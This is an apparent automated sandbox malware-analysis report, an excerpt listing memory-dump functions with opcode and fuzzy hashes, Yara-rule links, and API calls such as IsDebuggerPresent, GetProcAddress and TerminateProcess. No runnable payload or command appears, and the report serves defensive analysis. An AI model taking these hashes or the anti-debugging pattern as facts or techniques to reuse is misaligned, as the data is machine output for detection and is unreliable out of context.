Instruction Fuzzy Hash: 3F21F7B5509381AFD341CF29C840956FFF4EF89664F0889AEF888D7352D235E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04CFF155, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c25fceae32b11e225eda09472c2b9c5d31b3eb544fa10808c7b9044e29177dd2
Instruction ID: f19eb0461c697f3754da7b98f06ff167ad3aa5d8f044d9d91ed9a9f28e343de3
Opcode Fuzzy Hash: c25fceae32b11e225eda09472c2b9c5d31b3eb544fa10808c7b9044e29177dd2
Instruction Fuzzy Hash: B221A179F00148CBCB48DFE8D9502ADBBB2FB84308F25442ED20AAB354DB759C5ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 04CFCBB0, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52c914c734671e464af9c3d7e1ecea00ad8b1ed99e088fe99ae8f1d42caeaf5a
Instruction ID: c15b79b5874b8ff3316bd0006c4e7a69209f2cdbeb04f305a35eb4b2aeecf756
Opcode Fuzzy Hash: 52c914c734671e464af9c3d7e1ecea00ad8b1ed99e088fe99ae8f1d42caeaf5a
Instruction Fuzzy Hash: 9D212678605345CFC345EF38D940A1A7BB2FBC5304F604A69E592CB2A8EB34AD05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04CE2AA2, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504964655.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea7fda9e2c4321861a1da7bec0532900240ac4e037d53f1c620bc52a6230a8a8
Instruction ID: 37c029bd05e8afae8024df74248e69f510223ea604024bd4cd14a8c87f3ceb65
Opcode Fuzzy Hash: ea7fda9e2c4321861a1da7bec0532900240ac4e037d53f1c620bc52a6230a8a8
Instruction Fuzzy Hash: C021E5B5508341AFD340CF19D880A1BFBE4FF89660F04896EF888D7311E230E9148BA2

Uniqueness

Uniqueness Score: -1.00%

Function 04CE3514, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504964655.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f934c0aae01eae1ae070e99928ce655d88f3c3f350c3ced29f3d8dec80815c51
Instruction ID: 715d27338512ce7cdd4ae09fffe1fe7eef9fe6eb17dae281ce56001db45e9933
Opcode Fuzzy Hash: f934c0aae01eae1ae070e99928ce655d88f3c3f350c3ced29f3d8dec80815c51
Instruction Fuzzy Hash: 5311BAB5908341AFD350CF19D880A5BFBE4FBC8664F04896EF998D7311D231E9148FA2

Uniqueness

Uniqueness Score: -1.00%

Function 04CFEE22, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9303dabfacef6890b8e16f19997e506443ed2cfe5e1f99a5543b906759d1d52e
Instruction ID: 0212cc50812280fa4963e3f8e8055d73425ee1a30e3ec93932f7e57b7c4b6cf1
Opcode Fuzzy Hash: 9303dabfacef6890b8e16f19997e506443ed2cfe5e1f99a5543b906759d1d52e
Instruction Fuzzy Hash: B311D238B141118BE7989B29DC1036D76A7EBC4204F1488AED20BAB294DA799D068B92

Uniqueness

Uniqueness Score: -1.00%

Function 023F12CC, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.500781648.00000000023F0000.00000040.00000040.sdmp, Offset: 023F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad162861c2b88bb06af8af919b855e24a0b8b05382296354e3802613390e70bd
Instruction ID: 330abb98a85ebe0139d871df9c77dc8661aec819871063f5ca313f2b2f6a5e60
Opcode Fuzzy Hash: ad162861c2b88bb06af8af919b855e24a0b8b05382296354e3802613390e70bd
Instruction Fuzzy Hash: F9110631204241DFDB15CB54F940F26BB95EB89708F28C6ADEA8D5BA53C37BD803CA51

Uniqueness

Uniqueness Score: -1.00%

Function 04CFE0DA, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcfcd942885ce7f8d6e5fa18f24d1cbfcf052e2e380530df843d846cd3840d9b
Instruction ID: b59dc5d8ac0f70472afd4422f7ebd4b8b5efd697813a1f788784204d5af5e4d3
Opcode Fuzzy Hash: dcfcd942885ce7f8d6e5fa18f24d1cbfcf052e2e380530df843d846cd3840d9b
Instruction Fuzzy Hash: 0521167811938ACFC354EF28D59559ABBF1FB85304F04886EE48AC7265EB35AD45CF02

Uniqueness

Uniqueness Score: -1.00%

Function 04CFFD08, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53ab2374896174c9f1d4dae93cb1c621d71d0359c2425c8cad87ed8cc2399d8
Instruction ID: de48c2c2f89bb4f44cc92142827e5e2f38ef3de3fc0aefdc7841284c16d67c06
Opcode Fuzzy Hash: a53ab2374896174c9f1d4dae93cb1c621d71d0359c2425c8cad87ed8cc2399d8
Instruction Fuzzy Hash: 9E01D6253040059BC74A6F7D586016E7B6BEFC6244B5944AFD249CF345DE65881783A2

Uniqueness

Uniqueness Score: -1.00%

Function 04CFF879, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7bff955e139b5e2bee178b54bae0c9542d6e31a67619f329ed262e948281f2b
Instruction ID: dafc77211c7373be680284efcf060a7716460daa61a2da7703dd30d65cb3a86d
Opcode Fuzzy Hash: b7bff955e139b5e2bee178b54bae0c9542d6e31a67619f329ed262e948281f2b
Instruction Fuzzy Hash: 7A019E71B002555FCB85DA7C5C942FE7BE3DFC9218B14497BD248D7641EA25CA1287C0

Uniqueness

Uniqueness Score: -1.00%

Function 04CFECC8, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ee798923c49049276d1e9a2b27fec50c362c45618f46b831e36e06623f2ae71
Instruction ID: 0b86c4e45304eb15d753fd32114b443abbb38e59bb9611d79340fff74036fd40
Opcode Fuzzy Hash: 7ee798923c49049276d1e9a2b27fec50c362c45618f46b831e36e06623f2ae71
Instruction Fuzzy Hash: 24113638B14101CBD768AF28CC1032CB2B3E7C4344F15489AD20AEB2E4EB79DC418B42

Uniqueness

Uniqueness Score: -1.00%

Function 04CFEC16, Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfa5b13c815846189dd445e97a9f1724fe7ce4e136d825aa97ddcc7fd1828ecc
Instruction ID: 5f3cfeddfa3c2dff5e33c894e0109ea1460c2ad92e5d2480b79111b16125eb27
Opcode Fuzzy Hash: cfa5b13c815846189dd445e97a9f1724fe7ce4e136d825aa97ddcc7fd1828ecc
Instruction Fuzzy Hash: D10126387041018BE754AB38CC1036DB273E784344F0484AAE707E73D8EF79AD168B92

Uniqueness

Uniqueness Score: -1.00%

Function 04CFEC86, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e6f56596e430b7b5ec9afe62f5a76bdab8144dae6764f312513b17c5409be40
Instruction ID: e0446e78a388b473ce67272b9d5f3844d395e2cde82063384aea0bed8b48025b
Opcode Fuzzy Hash: 4e6f56596e430b7b5ec9afe62f5a76bdab8144dae6764f312513b17c5409be40
Instruction Fuzzy Hash: FF01453870811187E7986B38CC1132CB263E7C4344F1489ABE20BEB2D8DE79AD058B92

Uniqueness

Uniqueness Score: -1.00%

Function 04CFEF9C, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41b12e92b1bd643c1b9dc224f18e1b1b444fa4b2e462bc28cea01d346d77c364
Instruction ID: 396483f64b7ba8b771870b53f8c890a3e6a35c564d6f2c41e37b137e43509eda
Opcode Fuzzy Hash: 41b12e92b1bd643c1b9dc224f18e1b1b444fa4b2e462bc28cea01d346d77c364
Instruction Fuzzy Hash: 83012634B141518BD7686B38CC1032DB277EBC4348F0548ABE607DB2D4EE799D418792

Uniqueness

Uniqueness Score: -1.00%

Function 04CFFD18, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8709def1522d987f760ade7a6c6ffe8cf497d6a1a2922a9fdb10d5ce0b1cacf
Instruction ID: 0e4c619845d795ba92f52f9bd645c10c7e942ee1740c544edd27e9b129a27c63
Opcode Fuzzy Hash: b8709def1522d987f760ade7a6c6ffe8cf497d6a1a2922a9fdb10d5ce0b1cacf
Instruction Fuzzy Hash: 3401D13530000597C74A6F7E682067E76ABEBC5254B98846FD24ACF344DFA9CC0787E2

Uniqueness

Uniqueness Score: -1.00%

Function 04CFEBF0, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 998de239b3bf3da0c78de0f638221f1eb070d427ce1814ea1f4db7fcedef6c5a
Instruction ID: b9233970209523edd7e18642bc7551ac946738d037f30f21d45c560da84f22f4
Opcode Fuzzy Hash: 998de239b3bf3da0c78de0f638221f1eb070d427ce1814ea1f4db7fcedef6c5a
Instruction Fuzzy Hash: 43012234B14105CBE758AB39CC1033C72B3FBC4344F0588AAD60AAB2D4DFB99D468B92

Uniqueness

Uniqueness Score: -1.00%

Function 04CFEC6A, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78b3265523ed9c188c3a1956499d35e922c8143b752d3d18dd9c2a7f307b025d
Instruction ID: 9730298929319bbd36d535d96343564fae7e768f68e52e0570f75d7c95a3bca5
Opcode Fuzzy Hash: 78b3265523ed9c188c3a1956499d35e922c8143b752d3d18dd9c2a7f307b025d
Instruction Fuzzy Hash: 75012638B181828BD7155B38CC1032CBB73EB84304F1848EBD646D7294DB799C158782

Uniqueness

Uniqueness Score: -1.00%

Function 04CFECB0, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce32a93c1f21ce5a6827833784c650a5a38681492a4dc5ab80c44116ff2606a6
Instruction ID: c0c8d82995a55a66e7233bfc50ccd4cbbb1c1136a2e26da39fc5ae885d9d351d
Opcode Fuzzy Hash: ce32a93c1f21ce5a6827833784c650a5a38681492a4dc5ab80c44116ff2606a6
Instruction Fuzzy Hash: A9012438B141018BE7586F38CC5132DB277E7C4344F4548AAE606EB2D4EBB99D158B92

Uniqueness

Uniqueness Score: -1.00%

Function 04CFF3ED, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 472729f9d71bf8fbf6546430a428557242847fd60659cb03220cf840f2242337
Instruction ID: c25e0e0692d3110f47a3971eb72dce53303d7f6fe91064ffb96098ed8ae6ab74
Opcode Fuzzy Hash: 472729f9d71bf8fbf6546430a428557242847fd60659cb03220cf840f2242337
Instruction Fuzzy Hash: 57F09E3130D3D44BC316D6795C100153FA6DBC3221B0A89BBD2A9C71D2E8586C0A8372

Uniqueness

Uniqueness Score: -1.00%

Function 04CFD1A1, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 227b9fd826052b8aaa93cf20236f38cd17a3ca164098a134152fae441ce5176f
Instruction ID: ec0034578ff0cd48fb45ceae07a04cb35ec45d5e17d99bc2a2d883fb8f2c5e33
Opcode Fuzzy Hash: 227b9fd826052b8aaa93cf20236f38cd17a3ca164098a134152fae441ce5176f
Instruction Fuzzy Hash: D7F090353041509FC7049B2CD4A8A59BFEAFF8E220B2544BAE449CB362CA719C45D791

Uniqueness

Uniqueness Score: -1.00%

Function 023F1388, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.500781648.00000000023F0000.00000040.00000040.sdmp, Offset: 023F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693b7c54016a59cdbfed5bf97d611671327a7796b2b33607a59a4987e9e37b45
Instruction ID: 649699d89ddcb679c91b25c0ab66e1c5f500d3e315d7584a447e95281f72ebd4
Opcode Fuzzy Hash: 693b7c54016a59cdbfed5bf97d611671327a7796b2b33607a59a4987e9e37b45
Instruction Fuzzy Hash: 1DF01D35108645DFC716CF40E940B15FBA6EB89718F24C6ADEA890BB62C337D813DE81

Uniqueness

Uniqueness Score: -1.00%

Function 023F05F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.500781648.00000000023F0000.00000040.00000040.sdmp, Offset: 023F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34466879774ff23ae70313a4274518590b61a71af74e53f7c34b7fb3b135fddb
Instruction ID: f561eb1e0447197bf691f83f55fd94490a2e4d2f136eb1d220c293edcd30291b
Opcode Fuzzy Hash: 34466879774ff23ae70313a4274518590b61a71af74e53f7c34b7fb3b135fddb
Instruction Fuzzy Hash: 92E092B6A006004BD750CF0AEC81852F7E8EB84630718C47FDC0D8B701E535B505CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 04CE357F, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504964655.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4214ae80340a1a5b9a963f80b73862108c5c91d598016c0f9dca4770bb20ab
Instruction ID: efc4bd85fe7143fc3b0d5b02069577d5d8a9a8f1cb1ff4a448803c781476e0db
Opcode Fuzzy Hash: db4214ae80340a1a5b9a963f80b73862108c5c91d598016c0f9dca4770bb20ab
Instruction Fuzzy Hash: C3E0D8F295124067D2108E0A9C41F22FB98EB80A30F04C467ED0C1B742E071B51489F5

Uniqueness

Uniqueness Score: -1.00%

Function 04CE2B17, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504964655.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62468afc678e7c17a458b055d7806a9325a77e1a8642b5291ddd40bada5d842d
Instruction ID: 53aada25a92c2144eb6414b2f4c459b2fd6cccf3ee98e64c3b4ce51e2d0bd20a
Opcode Fuzzy Hash: 62468afc678e7c17a458b055d7806a9325a77e1a8642b5291ddd40bada5d842d
Instruction Fuzzy Hash: C8E0D8B291124067E2108F0A9C41F22FB58EB80A70F04C467ED0C1F742E071B52489F5

Uniqueness

Uniqueness Score: -1.00%

Function 04CE2E2B, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504964655.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acdec243218399f8a2cb72641e0cfe0f593c0abbc7264abb09cca288ac2fc8e5
Instruction ID: 36cc81bc93bef5940be01280ca45501dd810dd1346969c96ae41468167cbb2c2
Opcode Fuzzy Hash: acdec243218399f8a2cb72641e0cfe0f593c0abbc7264abb09cca288ac2fc8e5
Instruction Fuzzy Hash: DBE0D8B291124467D210CE0A9C42F23FB98EB80A30F04C467ED0C5B702E172B514C9F5

Uniqueness

Uniqueness Score: -1.00%

Function 04CFCB3D, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8d186852af8e3b425b32c21ad89ccccb1ef5bcc3d69b7c947728709f20f80b4
Instruction ID: a5768eb91a2e728e799c8b0f2b89b0249abfd8757155f143a12b497f80c2e521
Opcode Fuzzy Hash: e8d186852af8e3b425b32c21ad89ccccb1ef5bcc3d69b7c947728709f20f80b4
Instruction Fuzzy Hash: B8F03AB461535ADFC301EF39E58560E7FF5FBC8344F248A18E149DA118DBB0AA05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 04CFCDDD, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac27097e61a76e5f6dd24561b8c321f549c16f3d302db7af2aebe47b554a8d41
Instruction ID: 723c51b2cae1cb4d222b9be76317c7988cad50af2198c01c4411b9903d10239d
Opcode Fuzzy Hash: ac27097e61a76e5f6dd24561b8c321f549c16f3d302db7af2aebe47b554a8d41
Instruction Fuzzy Hash: 77F0BEB8A592D6CFC302EF38E1957063FA4E782348F188D8CD2848E259D3B56828CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04CFDB8C, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdd27ccf417402d5d917b7571e39fd47d4a6aacd97d60e241f1c66a25a7b2db9
Instruction ID: 1d8a94fffbabd759cf395c9683b86d0ab308334dbe4e53fb14f00ce68fe2c815
Opcode Fuzzy Hash: cdd27ccf417402d5d917b7571e39fd47d4a6aacd97d60e241f1c66a25a7b2db9
Instruction Fuzzy Hash: 40D05B313000546B8914669DD05186E73DFDFD9561319107EE506C7350DD519C41C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 04CFEE9D, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29bf19d2b785d3c6cd8cce01f743b21c3048e28abc852831794c25c1a9df2a05
Instruction ID: 4905304aba3ec364e31abc21d3c265e8d9f232165e153d00d52a1c87bca99fc5
Opcode Fuzzy Hash: 29bf19d2b785d3c6cd8cce01f743b21c3048e28abc852831794c25c1a9df2a05
Instruction Fuzzy Hash: 07E086727006808BC675977E84503BF6AD39FC0390B15892E94579FB88DE69DC0547C6

Uniqueness

Uniqueness Score: -1.00%

Function 04CFDB90, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e16462a3d4f3710c9888964f3c5c768bb4835c282a037b6ebc9c9545a0279ab
Instruction ID: 7e21359d91880ff514f8c97c9552431a8243d315297fb236265d58f27c2597c9
Opcode Fuzzy Hash: 9e16462a3d4f3710c9888964f3c5c768bb4835c282a037b6ebc9c9545a0279ab
Instruction Fuzzy Hash: D0D0A731300054674514626E90218AF72CFDFD9572319107EE506C7360CD519C02C3E6

Uniqueness

Uniqueness Score: -1.00%

Function 023A23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.500687589.00000000023A2000.00000040.00000001.sdmp, Offset: 023A2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78f5b36cd1c5a9656a71e1d8328cb6aa9dbd9531428a2d216328ee211c530bf7
Instruction ID: cc937bdaeef65b2e3b96d9644f87dd0fe01b14298707febdae47ded2d0fa43ee
Opcode Fuzzy Hash: 78f5b36cd1c5a9656a71e1d8328cb6aa9dbd9531428a2d216328ee211c530bf7
Instruction Fuzzy Hash: 3AD05E79304A814FD3268A1CC1A4B963B94EF51B08F4A44F9AC008B673C768D581D200

Uniqueness

Uniqueness Score: -1.00%

Function 04CFCCFC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dca1d1e8d93f0297c1a5cf0a7ff62a7851af214e573146098dec96d4770f94c0
Instruction ID: 9f72f59a11d39bd43502c03d9c5d197f29e61d6ecc6e309b60582b35dddfaf41
Opcode Fuzzy Hash: dca1d1e8d93f0297c1a5cf0a7ff62a7851af214e573146098dec96d4770f94c0
Instruction Fuzzy Hash: A6E04FB49483029FC345DF25E58451ABFEAAFC4B01F008C1DD28A86651DA709904CF22

Uniqueness

Uniqueness Score: -1.00%

Function 023A23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.500687589.00000000023A2000.00000040.00000001.sdmp, Offset: 023A2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9816c590b13b230d32773ff9bf5f6356519a0b352b0625355067a481d3ed5cbd
Instruction ID: 63d23dc79960dcfd66d94b449153e6e8475e62a2596f42eca8333afe5f080f6d
Opcode Fuzzy Hash: 9816c590b13b230d32773ff9bf5f6356519a0b352b0625355067a481d3ed5cbd
Instruction Fuzzy Hash: 3BD05E342002814BCB15DB1CC2A4F5A37D4EB42B08F0644F8AC008B2A2C7A8E8C1C600

Uniqueness

Uniqueness Score: -1.00%

Function 04CFEDEE, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7c165c8810e9167da1693e4ed4a4dac36326301bde4eda3b6dbdc431a23e161
Instruction ID: 53426b1a6cd545fc267f20b756f9ce6696b7ec57187595540cfebf7084044dd5
Opcode Fuzzy Hash: a7c165c8810e9167da1693e4ed4a4dac36326301bde4eda3b6dbdc431a23e161
Instruction Fuzzy Hash: 6CC01234615211DBEBA48764EC4075977759B40304F1141A5900E2B1E4CD35DDC2CB56

Uniqueness

Uniqueness Score: -1.00%

Function 04CFF022, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.504971477.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb34597df424fd19c3845d3785378fc3b5f8790be96221221e40d571a37b692
Instruction ID: 6fcf4f2f0500fad332453b79c34cfbee74263df818a3bb8f3649a79005f95a3b
Opcode Fuzzy Hash: 2cb34597df424fd19c3845d3785378fc3b5f8790be96221221e40d571a37b692
Instruction Fuzzy Hash: 98B09272A2A695C6C77A8A3C89002B86A7BEF50E42796145DC003A90A8CA2BDE019656

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0044DBB5, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0044FB4E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0044FB63
UnhandledExceptionFilter.KERNEL32(fE), ref: 0044FB6E
GetCurrentProcess.KERNEL32(C0000409), ref: 0044FB8A
TerminateProcess.KERNEL32(00000000), ref: 0044FB91

Strings

fE, xrefs: 0044FB69

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: fE
API String ID: 2579439406-3508596130
Opcode ID: 6d79ac7a43b365c1be395b7bb93aeb4bca2c26a627e4eb37e2f7f5d18965c67f
Instruction ID: dabe6f5edcc7dc9b73acd27526061d38560e233fe3bef4922d800a7883139395
Opcode Fuzzy Hash: 6d79ac7a43b365c1be395b7bb93aeb4bca2c26a627e4eb37e2f7f5d18965c67f
Instruction Fuzzy Hash: 2721CBB48013019BD740DF28E889A447BB4FB0C36BF92543AE81887666E7B4DA848F4D

Uniqueness

Uniqueness Score: -1.00%

Function 0044D03C, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00454660,0000000C,0044D177,00000000,00000000,?,?,0044C6BF,0044B10E), ref: 0044D04E
__crt_waiting_on_module_handle.LIBCMT ref: 0044D059

Part of subcall function 0044C15C: Sleep.KERNEL32(000003E8,?,?,0044CF9F,KERNEL32.DLL,?,0044C6EC,?,0044B108,?), ref: 0044C168
Part of subcall function 0044C15C: GetModuleHandleW.KERNEL32(?,?,?,0044CF9F,KERNEL32.DLL,?,0044C6EC,?,0044B108,?), ref: 0044C171

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0044D082
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0044D092
__lock.LIBCMT ref: 0044D0B4
InterlockedIncrement.KERNEL32(004554D8), ref: 0044D0C1
__lock.LIBCMT ref: 0044D0D5
___addlocaleref.LIBCMT ref: 0044D0F3

Strings

EncodePointer, xrefs: 0044D076
DecodePointer, xrefs: 0044D08A
KERNEL32.DLL, xrefs: 0044D048, 0044D04D, 0044D058

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: dfa1a58d80b752534e58b11aa74cb1ff6a9b63a5c9848c06b3c99418cea52755
Instruction ID: 722da0375dd8128faeba69fc611d4ac5d7b7016a2bef2cd6be59bc92eb0381bb
Opcode Fuzzy Hash: dfa1a58d80b752534e58b11aa74cb1ff6a9b63a5c9848c06b3c99418cea52755
Instruction Fuzzy Hash: 971193B0900701AEE7209F36DC41B5ABBE0AF0871AF10851FE89997292CB78DA45CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 0044EF60, Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0044EF6C

Part of subcall function 0044D19C: __getptd_noexit.LIBCMT ref: 0044D19F
Part of subcall function 0044D19C: __amsg_exit.LIBCMT ref: 0044D1AC

__amsg_exit.LIBCMT ref: 0044EF8C
__lock.LIBCMT ref: 0044EF9C
InterlockedDecrement.KERNEL32(?), ref: 0044EFB9
InterlockedIncrement.KERNEL32(024F2D40), ref: 0044EFE4

Memory Dump Source

Source File: 0000000C.00000002.499663981.000000000044B000.00000040.00000001.sdmp, Offset: 0044B000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 44e9cc33b1d4fccc7eafbb5da3ea52417cac5ffc104ddbf077334cea45ceb235
Instruction ID: 8093fd0acbb3a7c73c4258a6a093280565af094bf9e10da7167a79e77eb1a79e
Opcode Fuzzy Hash: 44e9cc33b1d4fccc7eafbb5da3ea52417cac5ffc104ddbf077334cea45ceb235
Instruction Fuzzy Hash: B701A131A01B11BBF721AB66980575E7B60BB0472AF54401BF844A7292C73CE959CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 0044D577, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0044D595

Part of subcall function 0044B445: __mtinitlocknum.LIBCMT ref: 0044B45B
